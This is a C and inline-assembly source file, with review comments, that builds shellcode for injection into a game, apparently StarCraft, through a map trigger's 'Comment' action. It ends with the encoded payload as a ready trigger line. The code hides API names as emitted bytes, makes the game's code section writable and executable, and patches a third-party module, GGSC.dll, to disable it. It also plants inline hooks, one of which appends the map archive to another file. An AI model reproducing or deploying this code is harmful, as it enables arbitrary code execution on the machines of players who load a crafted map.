- #include <stdio.h>
- #include <windows.h>
- #pragma comment(lib,"ole32.lib")
- #pragma comment(lib,"dxguid.lib")
- #include "dmusici.h"
- #include "windows.h"
- #define DMUS_SEG_REPEAT_INFINITE 0xFFFFFFFF
- #define PINT int *
- #define FASTCALL __fastcall
- #pragma pack(1)
// Trigger-action parameter record handed to Comment(). Packed (the
// `#pragma pack(1)` above applies), so it is exactly 26 bytes:
// 6 DWORDs + 1 USHORT. The field names are the author's; Comment() never
// reads `params`, so nothing in this file depends on the layout beyond
// the calling convention.
typedef struct
{
DWORD Unused0;
DWORD Text;//1
DWORD Code;//2
DWORD Unused2;//
DWORD Address;
DWORD Value;
USHORT Operator;
} *ActionParams;
typedef void *HANDLE;// redeclares windows.h's HANDLE with the same underlying type (void*); redundant but legal
//-----------------------------------------------------------------------
// BOOL __fastcall Comment(ActionParams params)
//
// Trigger-action entry point that runs inside the game process ("V4").
// `params` is never read.  What the visible code does, in order:
//   1. resolves VirtualProtect / WriteProcessMemory / ReadProcessMemory by
//      walking the PEB loader list and calling the GetProcAddress import
//      slot at [4ED160h]; each API name is emitted as raw bytes and its
//      address obtained with a `call` over them (no string literals);
//   2. makes 401000h..4ED000h PAGE_EXECUTE_READWRITE;
//   3. opens the archive named at 509364h, reads staredit\scenario.chk,
//      folds an additive checksum over it and compares it with the first
//      dword of a second archive file (name at 4FBD08h); mismatch -> FALSE;
//   4. on match: rewrites 4 bytes inside a module called "GGSC.dll" if it
//      is loaded, snapshots three memory regions into a fresh allocation,
//      and installs two in-process hooks: 44811Ch -> QuitAsm (restores the
//      snapshots) and 464FC5h -> a stub copied to 52E055h (appends one file
//      to another through msvcrt); then returns TRUE.
// Returns: TRUE when the checksum matched, FALSE otherwise.
// NOTE(review): every address is a hard-coded absolute VA of one specific
//   game build.  No API return value is checked (a failed OpenArchive,
//   VirtualAlloc, GetModuleHandle or fopen is followed by use of the bogus
//   result).  The code section is left RWX for the life of the process and
//   the stubs patch .text in place (W^X violation).  The PEB walk plus
//   byte-emitted API names is the classic position-independent shellcode
//   shape, which is exactly what endpoint detection keys on.
//-----------------------------------------------------------------------
BOOL FASTCALL Comment(ActionParams params)
{//V4
HMODULE t;// base of "GGSC.dll" when it is loaded (left uninitialised otherwise)
HANDLE mpq,file,file2;// archive handle, scenario.chk handle, second-file handle
char *buffer;// VirtualAlloc'd copy of scenario.chk plus 4 spare bytes
DWORD siz,siz2;// scenario.chk size (overwritten with bytes read); second file size minus 4
char *path;// = buffer + siz: the 4 spare bytes, used to hold the stored checksum
BOOL (WINAPI*sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *);
BOOL (WINAPI*sc_ReadProcessMemory)( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesRead );
BOOL (WINAPI*sc_WriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesWritten );
DWORD oldProtect;// VirtualProtect out-param; later reused as ReadFile's bytes-read out-param
_asm{
// --- resolve VirtualProtect ------------------------------------------
// `call $+5+N` jumps over the N emitted bytes and leaves their address on
// the stack, i.e. it pushes the name string as GetProcAddress's 2nd arg.
call $+5+15;// 15 = number of _EMIT bytes below, i.e. the string length including the \0
_EMIT 'V';// the API function name is emitted here
_EMIT 'i'
_EMIT 'r'
_EMIT 't'
_EMIT 'u'
_EMIT 'a'
_EMIT 'l'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 't'
_EMIT 'e'
_EMIT 'c'
_EMIT 't'
_EMIT '\0';// the NUL terminator is indispensable
mov eax,fs:30h;// PEB
mov eax,[eax+0Ch];// PEB->Ldr
mov esi,[eax+1Ch];// Ldr->InInitializationOrderModuleList.Flink (1st entry)
lodsd;// eax = that entry's Flink -> 2nd entry of the list
push [eax+8];// 2nd entry's DllBase -> hModule; which module that is depends on the Windows version (unverified here)
call DS:[0x4ED160];// GetProcAddress import slot; a string literal cannot be written here, it would not compile
mov sc_VirtualProtect,eax;// NOTE(review): never checked for NULL
// --- resolve WriteProcessMemory (same walk as above) -------------------
call $+5+19;// 19 = number of _EMIT bytes below, i.e. the string length including the \0
_EMIT 'W';// the API function name is emitted here
_EMIT 'r'
_EMIT 'i'
_EMIT 't'
_EMIT 'e'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 'c'
_EMIT 'e'
_EMIT 's'
_EMIT 's'
_EMIT 'M'
_EMIT 'e'
_EMIT 'm'
_EMIT 'o'
_EMIT 'r'
_EMIT 'y'
_EMIT '\0';// the NUL terminator is indispensable
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];// GetProcAddress import slot; a string literal cannot be written here, it would not compile
mov sc_WriteProcessMemory,eax;
// --- resolve ReadProcessMemory (same walk as above) --------------------
call $+5+18;// 18 = number of _EMIT bytes below, i.e. the string length including the \0
_EMIT 'R';// the API function name is emitted here
_EMIT 'e'
_EMIT 'a'
_EMIT 'd'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 'c'
_EMIT 'e'
_EMIT 's'
_EMIT 's'
_EMIT 'M'
_EMIT 'e'
_EMIT 'm'
_EMIT 'o'
_EMIT 'r'
_EMIT 'y'
_EMIT '\0';// the NUL terminator is indispensable
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];// GetProcAddress import slot; a string literal cannot be written here, it would not compile
mov sc_ReadProcessMemory,eax;
// --- remove page protection: start --------------------------------------
lea eax,oldProtect
push eax// &oldProtect
push 40h// PAGE_EXECUTE_READWRITE
push 0EC000h// size: 401000h..4ED000h
push 401000h// start of the game's code section
call sc_VirtualProtect// NOTE(review): leaves ~944 KB of .text RWX for the rest of the process lifetime; result ignored

// --- verify scenario.chk --------------------------------------------------
lea eax,mpq
push eax// &mpq
push 0
push 0
push 0509364h// archive path string kept in a game global (copied and fopen'd again in the rep1 stub below)
_EMIT 0xFF
_EMIT 0x15
_EMIT 0xBC
_EMIT 0xD2
_EMIT 0x4E
_EMIT 0x00// FF 15 BC D2 4E 00 = call dword ptr [4ED2BCh] -- OpenArchive(name,0,0,&mpq)
lea eax,[file]
push eax// &file
push 0
push 4EE0B0h//staredit\\scenario.chk
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x68
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// FF 15 68 D3 4E 00 = call dword ptr [4ED368h] -- OpenFileEx(mpq,name,0,&file)
push 0
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x58
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// FF 15 58 D3 4E 00 = call dword ptr [4ED358h] -- GetFileSize(file,0)
mov siz,eax
add eax,4// room for the 4-byte checksum slot after the data
push 40h// PAGE_EXECUTE_READWRITE (executable is unnecessary for a data buffer)
push 1000h// MEM_COMMIT
push eax//500K  -- actually siz + 4 bytes
push 0
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x2C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00// FF 15 2C D1 4E 00 = call dword ptr [4ED12Ch] -- VirtualAlloc(0,siz+4,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
mov buffer,eax// NOTE(review): NULL on failure, never checked
push 0
lea ecx,siz
push ecx// &bytesRead (overwrites siz with the count actually read)
push siz
push eax// buffer
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// FF 15 54 D3 4E 00 = call dword ptr [4ED354h] -- ReadFile(file,buffer,siz,&siz,0)
}
// Fold every 7th byte of the file into an additive checksum weighted by i%64.
// NOTE(review): as rendered this line reads `* buffer` (pointer times int, which
// does not compile); the `[i]` index was most likely swallowed by forum BBCode
// italics -- the intent is buffer[i].  This is an integrity check only: anyone
// holding the file can recompute it, so it is not tamper-proof.
DWORD check = 0;
for(unsigned int i = 0; i < siz; i += 7)
check += (i % 64) * buffer;
path = buffer + siz;// the 4 spare bytes right after the data
_asm
{
lea ecx,file2
push ecx// &file2
push 0
push 04FBD08h// second file name kept in a game global
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x68
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// call dword ptr [4ED368h] -- OpenFileEx(mpq,name,0,&file2)
push 0
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x58
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // call dword ptr [4ED358h] -- GetFileSize(file2,0)
cmp eax,0// NOTE(review): these flags are discarded: `sub` below rewrites ZF
sub eax,4// and `mov` keeps flags, so the `je` fires when the size is exactly 4,
mov siz2,eax// not when it is 0 -- an empty file falls through with siz2 = -4
je crash
lea ecx,oldProtect// reused as ReadFile's bytes-read out-param
push 0
push ecx
push 4
push path
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // call dword ptr [4ED354h] -- ReadFile(file2,path,4,&oldProtect,0): first dword = stored checksum
lea ecx,oldProtect
mov eax, 0064650Ch
mov eax, dword ptr [eax]// pointer kept in the game global at 64650Ch (what it addresses is not visible here)
inc eax
push 0
push ecx
push siz2
push eax
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // ReadFile(file2,ptr+1,siz2,&oldProtect,0): rest of the file; NOTE(review): nothing checks that the destination can hold siz2 bytes
mov eax,dword ptr [path]
mov eax,dword ptr [eax]// stored checksum read above
cmp eax,check
je OK
}
crash: return false;// mismatch (or the mis-aimed size test): mpq/file/file2/buffer are leaked on this path
OK:
_asm{
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x60
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // FF 15 60 D3 4E 00 = call dword ptr [4ED360h] -- CloseFile(file)
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x60
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // CloseFile(file2)
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0xC0
_EMIT 0xD2
_EMIT 0x4E
_EMIT 0x00 // FF 15 C0 D2 4E 00 = call dword ptr [4ED2C0h] -- CloseArchive(mpq)
push 8000h//MEM_RELEASE
push 0
push buffer
call DS:[4ED114h];//VirtualFree(buffer,0,MEM_RELEASE)
// --- "Ban GGSC": look for a module named GGSC.dll ------------------------
call $+14// 14 = 5 + the 9 emitted bytes; pushes the address of "GGSC.dll"
_EMIT 'G'
_EMIT 'G'
_EMIT 'S'
_EMIT 'C'
_EMIT '.'
_EMIT 'd'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x5C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00// FF 15 5C D1 4E 00 = call dword ptr [4ED15Ch]; slot is unlabelled -- presumably a module-handle lookup by name that returns 0 when absent (unverified)
cmp eax,0
je backup// module not present: skip the patch
mov t,eax
}
// Rewrite 4 bytes at t+0D95Ah inside that module to 90 90 83 EA (OB1, little-endian)
// unless they already read so.  (HANDLE)-1 is the current-process pseudo-handle.
// NOTE(review): OBJ stays uninitialised if ReadProcessMemory fails, and both
// results are ignored; this patches third-party code at a fixed RVA, which
// breaks silently on any other build of that module.
int aa=(int)t+0x0d95a;
int OB1=0xea839090;
unsigned int OBJ;
(*sc_ReadProcessMemory)((HANDLE)-1,(LPCVOID)aa,&OBJ,4,0);
if(OBJ!=OB1)(*sc_WriteProcessMemory)((HANDLE)-1,(LPVOID)aa,&OB1,4,0);
//Backup
_asm
{
backup:
// Snapshot three regions into a fresh block so QuitAsm can put them back.
push 40h// PAGE_EXECUTE_READWRITE (the block only holds data; RW would do)
push 1000h// MEM_COMMIT
push 20000h//500K  -- 128 KB; the three copies below total 1013Ch+0F9Ch+9E24h = 1AEFCh bytes
push 0
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x2C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00// call dword ptr [4ED12Ch] -- VirtualAlloc(0,20000h,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
mov EBX,eax//ebx=quitasm  -- ebx = backup block (NULL never checked)
MOV EDI,EBX
MOV ECX,1013Ch
MOV ESI,4F25C0h
REP MOVSB// region 1: 4F25C0h, 1013Ch bytes
MOV ECX,0F9Ch
MOV ESI,537510h
REP MOVSB// region 2: 537510h, 0F9Ch bytes
MOV ECX,9E24h
MOV ESI,587660h
MOV ESI,[ESI]// region 3 lives behind the pointer stored at 587660h
REP MOVSB// region 3: 9E24h bytes
// Install hook #1: overwrite 44811Ch with `jmp QuitAsm` (E9 rel32).
pushad
call $+5
pop eax// eax = address of this `pop`
add eax,21h;// + 21h = the PUSHAD of QuitAsm below; the constant must equal the encoded length of the instructions in between (fragile, unverified)
mov edx,044811ch// hook site
sub eax,edx
sub eax,5// rel32 = target - (site + 5)
mov byte ptr ds: [edx],0e9h// opcode: jmp rel32
xchg [edx+1],eax;// write rel32; the 4 original bytes land in eax and are discarded
mov EAX,52DF00h
mov esi,EBX
mov dword ptr [eax],esi// publish the backup block pointer at 52DF00h for QuitAsm
popad
jmp e1;
//QuitAsm -- entered via the jmp planted at 44811Ch: restore the three snapshots
// and the hook site, then resume the game right after the displaced bytes.
PUSHAD
MOV ECX,1013Ch
MOV ESI,DWORD PTR DS:[52DF00h];// backup block
MOV EDI,4F25C0h
REP MOVSB
MOV ECX,0F9Ch
MOV EDI,537510h
REP MOVSB
MOV ECX,9E24h
MOV EDI,587660h
MOV EDI,DWORD PTR DS:[EDI]
REP MOVSB
MOV DWORD PTR DS:[44811Ch],8966c085h// put back the first 8 original bytes of the hook site:
MOV DWORD PTR DS:[448120h],645fb80dh//   85 C0 66 89 0D B8 5F 64 (test eax,eax / mov [645FB8h],cx); the 9th byte (00) was never overwritten
POPAD
TEST EAX,EAX// re-execute the two displaced instructions...
MOV WORD PTR DS:[645FB8h],CX
MOV EAX,448125h
JMP EAX// ...and continue at 44811Ch + 9
//save rep
//jmp
// Install hook #2: 464FC5h := jmp 52E055h (E9 8B 90 0C 00: 464FC5h + 5 + 0C908Bh = 52E055h),
// then copy 300h bytes of this function (the rep1 stub below) to 52E055h.
e1: pushad
mov eax,464FC5h
mov byte ptr[eax],0E9h
inc eax
mov dword ptr[eax],000c908bh
call $+5
pop esi
add esi,16h//var  -- esi = rep1 below; byte distance from `pop esi`, encoding-dependent
mov edi,52e055h
mov ecx,300h//var  -- must cover the whole stub down to its final `jmp ecx` (not verified here)
rep movsb//dump
popad
jmp rep2
//save asm
// rep1 -- runs at 52E055h when the game reaches 464FC5h.  Appends the file
// named at 509364h (the archive path) to the file named at 12F178h, after
// padding so the first file's length is rounded up to a 200h-byte boundary.
// msvcrt is called through a table built at 52E034h:
//   [ebp+0]=fopen +4=ftell +8=fread +0Ch=fwrite +10h=fseek +14h=fclose +18h=malloc +1Ch=free
// Scratch globals: 52E018h FILE*, 52E01Ch second file size, 52E020h pad count,
// 52E024h malloc'd buffer.  All calls are cdecl; the stub pops its own args
// with `add esp,N` or a throwaway `pop ebx`.
rep1: pushad
mov ecx,200h
mov esi,012F178h// NOTE(review): 12Fxxxh looks like a main-thread stack address -- presumably a path string living there at hook time, unverified
mov edi,52e400h
rep movsb// 200h bytes -> 52E400h (file 1 name)
mov ecx,200h
mov esi,0509364h
rep movsb// 200h bytes -> 52E600h (file 2 name: the archive path used by OpenArchive above)
mov ebp,52E034h// function table base
call $+5+11;// pushes "msvcrt.dll"
_EMIT 'm'
_EMIT 's'
_EMIT 'v'
_EMIT 'c'
_EMIT 'r'
_EMIT 't'
_EMIT '.'
_EMIT 'd'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
call DS:[004ED1B0h];//GetModuleHandle("msvcrt.dll")
mov ebx,eax;// hModule for the GetProcAddress calls below (NULL never checked)
call $+5+6;// pushes "fopen"
_EMIT 'f'
_EMIT 'o'
_EMIT 'p'
_EMIT 'e'
_EMIT 'n'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(ebx,"fopen")
mov [ebp], eax

call $+5+6;// pushes "ftell"
_EMIT 'f'
_EMIT 't'
_EMIT 'e'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+04h], eax

call $+5+6;// pushes "fread"
_EMIT 'f'
_EMIT 'r'
_EMIT 'e'
_EMIT 'a'
_EMIT 'd'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+08h], eax

call $+5+7;// pushes "fwrite"
_EMIT 'f'
_EMIT 'w'
_EMIT 'r'
_EMIT 'i'
_EMIT 't'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+0Ch], eax

call $+5+6;// pushes "fseek"
_EMIT 'f'
_EMIT 's'
_EMIT 'e'
_EMIT 'e'
_EMIT 'k'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+010h], eax
call $+5+7;// pushes "fclose"
_EMIT 'f'
_EMIT 'c'
_EMIT 'l'
_EMIT 'o'
_EMIT 's'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+014h], eax

call $+5+7;// pushes "malloc"
_EMIT 'm'
_EMIT 'a'
_EMIT 'l'
_EMIT 'l'
_EMIT 'o'
_EMIT 'c'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+018h], eax

call $+5+5;// pushes "free"
_EMIT 'f'
_EMIT 'r'
_EMIT 'e'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]
mov [ebp+01Ch], eax
// --- file 1: measure its length -------------------------------------------
call $+5+3// pushes "rb" (mode, 2nd arg)
_EMIT 'r'
_EMIT 'b'
_EMIT '\0'
push 52e400h
call [ebp] // fopen1  -- fopen(file1 name,"rb"); NOTE(review): NULL never checked
add esp,8
mov dword ptr DS:[052e018h],eax //f1
push 2// SEEK_END
push 0
push eax
call [ebp+010h] //fseek1
add esp,12
push dword ptr DS:[052e018h]
call [ebp+04h] //ftell1  -- eax = size of file 1
pop ebx// cdecl: drop the argument (ebx is free once the table is built)
mov ecx,0200h//calc
xor edx,edx
_EMIT 0xF7
_EMIT 0xF9//idiv eax,ecx  -- F7 F9 = idiv ecx: edx = size mod 200h
sub ecx,edx//ecx = pad 00 count  -- 200h - (size mod 200h); a full 200h when the size is already aligned
mov dword ptr DS:[052e020h],ecx//f1pad

push dword ptr DS:[052e018h]
call [ebp+014h] //fclose
pop ebx
// --- file 2: read it whole into a buffer that leaves `pad` bytes in front ---
call $+5+3// pushes "rb"
_EMIT 'r'
_EMIT 'b'
_EMIT '\0'
push 052e600h
call [ebp] // fopen2  -- fopen(file2 name,"rb"); NOTE(review): NULL never checked
add esp,8
mov dword ptr DS:[052e018h],eax //f2
push 2
push 0
push eax//FILE*
call [ebp+010h] //fseek map to end
add esp,12
push dword ptr DS:[052e018h]
call [ebp+04h] //ftell map f2
pop ebx
mov dword ptr DS:[052e01Ch],eax//f4 is f2size
add eax,dword ptr DS:[052e020h]// + pad
push eax
call [ebp+018h] //malloc  -- malloc(f2size + pad); NOTE(review): the pad bytes are never zeroed, so uninitialised heap is written out as "padding"; NULL not checked
pop ebx
mov edi,eax//!!! edi is the buffer
mov dword ptr DS:[052e024h],edi
push 0
push 0
push dword ptr DS:[052e018h]
call [ebp+010h] //fseek map to top1  -- fseek(f2,0,SEEK_SET)
add esp,12
mov ecx,dword ptr DS:[052e020h]//pad size
add edi,ecx// data goes after the pad
push dword ptr DS:[052e018h]//FILE*
push 1
push dword ptr DS:[052e01Ch]//size
push edi//buffer
call [ebp+08h] //fread1  -- fread(buffer+pad,f2size,1,f2)
add esp,16
push dword ptr DS:[052e018h]
call [ebp+014h] //fclose1
pop ebx
// --- append pad + file 2 to file 1 ----------------------------------------
call $+5+3// pushes "ab"
_EMIT 'a'
_EMIT 'b'
_EMIT '\0'
push 52e400h
call [ebp] // fopen1  -- fopen(file1 name,"ab")
add esp,8
mov dword ptr DS:[052e018h],eax
mov ebx,dword ptr DS:[052e01Ch]//f2size
add ebx,dword ptr DS:[052e020h] //+f1size  -- actually + pad
push eax//FILE*
push 1
push ebx
push dword ptr DS:[052e024h]
call [ebp+0Ch] //fwrite3  -- fwrite(buffer,f2size+pad,1,f1)
add esp,16
push dword ptr DS:[052e018h]
call [ebp+014h] //fclose1
pop ebx
push dword ptr DS:[052e024h]
call [ebp+01Ch] //free1
pop ebx

// Restore the 5 original bytes at the hook site (85 C0 74 1A B9 = test eax,eax / je / mov ecx,...) and resume there.
mov eax,0464FC5h
mov byte ptr[eax],085h
inc eax
mov dword ptr[eax],0B91A74C0h
popad
mov ecx,00464FC5h// NOTE(review): clobbers ecx after popad; the restored code reloads ecx only on the je-not-taken path (unverified whether the other path reads it)
jmp ecx
}
rep2: return true;
}
// Empty sentinel placed directly after Comment(): Base64Enc() uses
// (PBYTE)AfterFunction - (PBYTE)Comment as the default byte count to encode.
// That only works while the compiler/linker keeps the two functions adjacent
// and in source order, which is not guaranteed (optimisation or incremental
// linking may move them) -- verify the emitted size against the map file.
void AfterFunction(){}
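//-----------------------------------------------------------------------
// LPCSTR Base64Enc(int size = 0)
// Encodes the machine code of Comment() as printable text: every 3 input
// bytes become 4 characters in the range '0'..'o' (6-bit groups + 0x30).
// This is NOT RFC 4648 base64 (different alphabet, no '=' padding); the
// decoder on the consuming side has to use the same scheme.
//
// size: number of bytes to encode; <= 0 means "from Comment up to
//       AfterFunction" (relies on the two functions being laid out in
//       source order -- see AfterFunction).
// Returns: a NUL-terminated buffer allocated with new BYTE[]; the caller
//       owns it and must release it with delete[].
//
// Fix vs. the original: it allocated (size-1)*4/3+1 bytes but always wrote
// 4*ceil(size/3)+1, overflowing the heap for every size not divisible by 3,
// and it read 1-2 bytes past the input in the last group.  The buffer is
// now sized for the full output and the final group is zero-padded.
//-----------------------------------------------------------------------
LPCSTR Base64Enc(int size = 0)
{
    if (size <= 0)
        size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);
    if (size < 0)
        size = 0;                                   // defensive: layout not in source order -> encode nothing
    const PBYTE text = (PBYTE)Comment;
    const int groups = (size + 2) / 3;              // 3 input bytes -> 4 output chars, last group padded
    PBYTE out = new BYTE[groups * 4 + 1], buf = out;
    for (int pos = 0; pos < size; pos += 3)
    {
        BYTE b[3] = { 0, 0, 0 };                    // zero padding keeps the last group in bounds
        for (int k = 0; k < 3 && pos + k < size; ++k)
            b[k] = text[pos + k];
        *buf++ = ((b[0] >> 2) & 0x3f) + 0x30;
        *buf++ = (((b[0] & 3) << 4) | (b[1] >> 4)) + 0x30;
        *buf++ = (((b[1] & 0xF) << 2) | (b[2] >> 6)) + 0x30;
        *buf++ = (b[2] & 0x3F) + 0x30;
    }
    *buf = 0;
    return (LPCSTR)out;
}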
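//-----------------------------------------------------------------------
// Generator entry point: writes the two trigger-action lines that embed the
// encoded Comment() body to d:\desktop\comment20.txt.
// Returns 0 on success, 1 when the output file cannot be opened.
// Fixes vs. the original: fopen's result was passed to fprintf unchecked
// (NULL dereference when the path does not exist), the buffer returned by
// Base64Enc was leaked, and an unused `int i` is gone.
//-----------------------------------------------------------------------
int main(int argc, CHAR* argv[])
{
    (void)argc;
    (void)argv;
    FILE *f1 = fopen("d:\\desktop\\comment20.txt", "wb");
    if (f1 == NULL)
        return 1;                           // no output file: report instead of crashing inside fprintf
    LPCSTR encoded = Base64Enc();
    fprintf(f1, "Comment(\"%s\", 0, 0, 20, 0, 1);\nComment(\"\", 0, 0, 0, 0, 20);", encoded);
    delete[] (PBYTE)encoded;                // Base64Enc hands out a new BYTE[] buffer
    fclose(f1);
    return 0;
}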
- Comment("EH_\Pna8DeIGRDfhj0l0001FJG9dMF5\D79_M6ESM01TXC00002;@0b;L1b]og08?_lEH=5>08U5l>PC0000Eg9YM6E@LVmSIG=cCFE]Kg9i06BQ<00008]038]`7:goL0PnoaEPdDh0RDG\j180001BIF5TD79_HfEcLdeUKFmbN@1TXC00002;@0b;L1b]og08?_lEH=5>08U5i8e5m51Z@6P0`0h0J00@@03oEO2=AMA@JP1Z06QTTe00oaFldTh0SDGXD6X0J;3PCP3oMMCo5FSCCP1Z0?mej?lEF==>08U5`8?016Y0J00@001@JP3o5BcACP29ALQZ08e=`57oML1@ogGXoaEDddh0PfGh08=U_03[2H]5_8?01hU5_8]5_3]5`7<NRdFl<m9Z@5WglH]5b0=5_0nn00n_d0=En8UEn>_ARdG80dG0RDG<SDgHDFX0J0RmC`3oMMCo5FSCCP1Z0?mef?lEF==>08?h08?X18U5g7@iSDgdJP1AJPCoMLcoMMSo5ECCCP2=COBh36ET08\0@6X0DOmeg53oMMSo5ECCCP2;ALb;03]5n7@7<l3YT@<00?mej?lEH==>0?mef?lEH==>0?mee?lE`=9>06P0P000JP3oMLPnoaDDdDh0j0T00017Ae=3;VA\K03o5EcACP23n01d?HU5a8]5a0EJf@00RDGladG@T923jVX0JPB=AN1@ogGlJ_ooENB;AN0kAM1d46X0JPB=AM1@ogGlJ_ooENaZ@6P04000J0000P1Z0?lE;=5>08_HRo^i?0410;k09Dl0ljBiW0l00;h@ME<0ljBi99h00;iPMUP0RcKcY63X000005R3`26j785402_2PnP5?\H2jHM20KP0ge80Ro>9<67[Ef2i?04103j;=@3ODP2o`2E?0?>T^I`?002o47EC0?>T^BBN002oH7IH03j;?o>T?\L5785408G0IXTna`DPPD@03KQOI665`6HnR@fhGf@0^2F1A03oh62haDm60<H0jD3708^@303X000005j3aQJoEN1B0;T00`00ljAQjBD2001P^@02002nN?4B0;l0i580ljBi00800;iTTe00ljBm=>1B0>P;0000KG=fHg9d;VA\K00noaF`dDh0RmSX1P0006I_L6E^05<noaEPdDh0RDD0j0H0001VM6E\K01C?_lEH=5>08U51>P60000IW9UHF@0Dcko5F3ACP29A@SX1`0006IgLVUdI@1C?_lEH=5>08U53>P60000IW=UIF\0Dcko5F3ACP29AA3X1`0006ISK6mcI@1C?_lEH=5>08U55>P70000KF5\K6mS05<noaEPdDh0RDDHj0D0001VLVEU05<noaEPdDh0RDDLj0<0001bHP1X0>AB0?mE08?423jS6>1B06X2JP1@oeD@Pl@<?_le6>1B0?mE15^i008003?BmoT[bSj93B3PDP0nocDHh580oeDDFnP30000LV80J03VDP3oE@23a0PnXaSPDP1Z0VX0D?mE48?433ko=ASPDP3oE@AK?Z<Lh580?P<58>1B053oEAQKRoPnRCdTh580JP1Z03ko=ASPDP3oEA23a0`nR`dPh5800oTnocDHh580JP4nocDLh580EomE28?443ko=ASPDP3oEAAKj0<0001QHP1X0>AB0?mE08?423jS6>1B03j;7AcPDP0n0adPh580D6X1Dcko=BCPDP3oE@b3a10nocDHh580oeDDFcko=BCPDP3oEAaK^<E?AP3608E0a`30M1ZiHKW5CdH0on4c`41OGU_9`l=A", 0, 0, 20, 0, 1);
- Comment("", 0, 0, 0, 0, 20);